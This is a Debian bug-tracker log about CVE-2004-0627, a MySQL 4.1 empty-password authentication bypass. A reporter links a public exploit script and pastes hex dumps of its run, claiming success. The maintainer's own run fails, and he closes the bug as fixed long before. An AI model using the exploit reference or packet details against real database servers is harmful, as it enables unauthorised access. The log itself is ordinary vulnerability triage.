Debian Bug report logs -
#380507
CVE-2004-0627 check_scramble_323() zero-length password auth bypass
Reported by: patrick.matthaei@web.de
Date: Sun, 30 Jul 2006 16:48:20 UTC
Severity: important
Tags: moreinfo, security, unreproducible
Found in version 4.1.11a-4sarge
Done: Christian Hammers <ch@debian.org>
Bug is archived. No further changes may be made.
Toggle useless messages
Report forwarded to debian-bugs-dist@lists.debian.org, Christian Hammers <ch@debian.org>:
Bug#380507; Package mysql-server-4.1.
(full text, mbox, link).
Acknowledgement sent to patrick.matthaei@web.de:
New Bug report received and forwarded. Copy sent to Christian Hammers <ch@debian.org>.
(full text, mbox, link).
Message #5 received at submit@bugs.debian.org (full text, mbox, reply):
Package: mysql-server-4.1
Version: 4.1.11a-4sarge
Severity: important
Tags: security
http://www.milw0rm.com/exploits/311
With this exploit it's able to authenticate with the mysql server
without any password.
Log:
me@the-me:~$ ./mysql.pl perl *********
Using default MySQL port (3306)
Received greeting:
00000000 47 00 00 00 0A 34 2E 31 2E 31 31 2D 44 65 62 69
00000010 61 6E 5F 34 73 61 72 67 65 35 2D 6C 6F 67 00 C6
00000020 32 00 00 6F 7C 40 6B 79 3F 6E 2D 00 2C A2 08 02
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 54
00000040 2F 2E 39 73 58 3F 71 3F 25 37 00
Sending caps packet:
00000000 3A 00 00 01 85 A6 03 00 00 00 00 01 08 00 00 00
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000020 00 00 00 00 70 65 72 6C 00 14 00 00 00 00 00 00
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Received reply:
00000000 01 00 00 02 FE
Received OK reply, authentication successful!!
me@the-me:~$
It's an old exploit but the sargeversion is still exploitable.
Information forwarded to debian-bugs-dist@lists.debian.org:
Bug#380507; Package mysql-server-4.1.
(full text, mbox, link).
Acknowledgement sent to Christian Hammers <ch@debian.org>:
Extra info received and forwarded to list.
(full text, mbox, link).
Message #10 received at 380507@bugs.debian.org (full text, mbox, reply):
tags 380507 + unreproducible moreinfo
stop
Hello Patrick
On 2006-07-30 Patrick Matthäi wrote:
> http://www.milw0rm.com/exploits/311
> With this exploit it's able to authenticate with the mysql server
> without any password.
I cannot reproduce this behaviour. Which version do you use, this?
# dpkg -s mysql-server-4.1 | grep Version
Version: 4.1.11a-4sarge5
> Log:
> me@the-me:~$ ./mysql.pl perl *********
Did you use more than your IP or your hostname as "***"?
> It's an old exploit but the sargeversion is still exploitable.
It should have been fixed in 4.1.3 long before the Sarge release.
I get:
$ ./milw0rm311.pl root app109
Using default MySQL port (3306)
Received greeting:
00000000 47 00 00 00 0A 34 2E 31 2E 31 31 2D 44 65 62 69
00000010 61 6E 5F 34 73 61 72 67 65 35 2D 6C 6F 67 00 0D
00000020 00 00 00 6C 56 4A 51 36 58 3B 5E 00 2C A2 08 02
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 23
00000040 79 5A 39 4B 4E 27 76 3F 73 48 00
Sending caps packet:
00000000 3A 00 00 01 85 A6 03 00 00 00 00 01 08 00 00 00
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000020 00 00 00 00 72 6F 6F 74 00 14 00 00 00 00 00 00
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Received reply:
00000000 45 00 00 02 FF 15 04 23 32 38 30 30 30 41 63 63
00000010 65 73 73 20 64 65 6E 69 65 64 20 66 6F 72 20 75
00000020 73 65 72 20 27 72 6F 6F 74 27 40 27 61 70 70 31
00000030 30 39 27 20 28 75 73 69 6E 67 20 70 61 73 73 77
00000040 6F 72 64 3A 20 59 45 53 29
Authentication failed!
bye,
-christian-
Tags added: unreproducible, moreinfo
Request was from Christian Hammers <ch@debian.org>
to control@bugs.debian.org.
(full text, mbox, link).
Changed Bug title.
Request was from Christian Hammers <ch@debian.org>
to control@bugs.debian.org.
(full text, mbox, link).
Reply sent to Christian Hammers <ch@debian.org>:
You have taken responsibility.
(full text, mbox, link).
Notification sent to patrick.matthaei@web.de:
Bug acknowledged by developer.
(full text, mbox, link).
Message #19 received at 380507-done@bugs.debian.org (full text, mbox, reply):
retitle 380507 CVE-2004-0627 check_scramble_323() zero-length password auth bypass
stop
Hello
The www.milw0rm.com/exploits/311 scripts utilizes the CVE-2004-0627
vulnerability.
MySQL-3.23 and 4.0 were not affected as they did not contain "new style"
passwords and thus not check_scramble_323. 4.1 and 5.0 have a high
enough version.
bye,
-christian-
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org.
(Sun, 17 Jun 2007 12:22:18 GMT) (full text, mbox, link).
Bug unarchived.
Request was from Stefano Zacchiroli <zack@debian.org>
to control@bugs.debian.org.
(Sun, 10 Apr 2011 08:48:21 GMT) (full text, mbox, link).
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org.
(Mon, 09 May 2011 07:32:34 GMT) (full text, mbox, link).
Send a report that this bug log contains spam.
Debian bug tracking system administrator <owner@bugs.debian.org>.
Last modified:
Wed Oct 11 12:06:40 2017;
Machine Name:
buxtehude
Debian Bug tracking system
Debbugs is free software and licensed under the terms of the GNU
Public License version 2. The current version can be obtained
from https://bugs.debian.org/debbugs-source/.
Copyright © 1999 Darren O. Benham,
1997,2003 nCipher Corporation Ltd,
1994-97 Ian Jackson,
2005-2017 Don Armstrong, and many other contributors.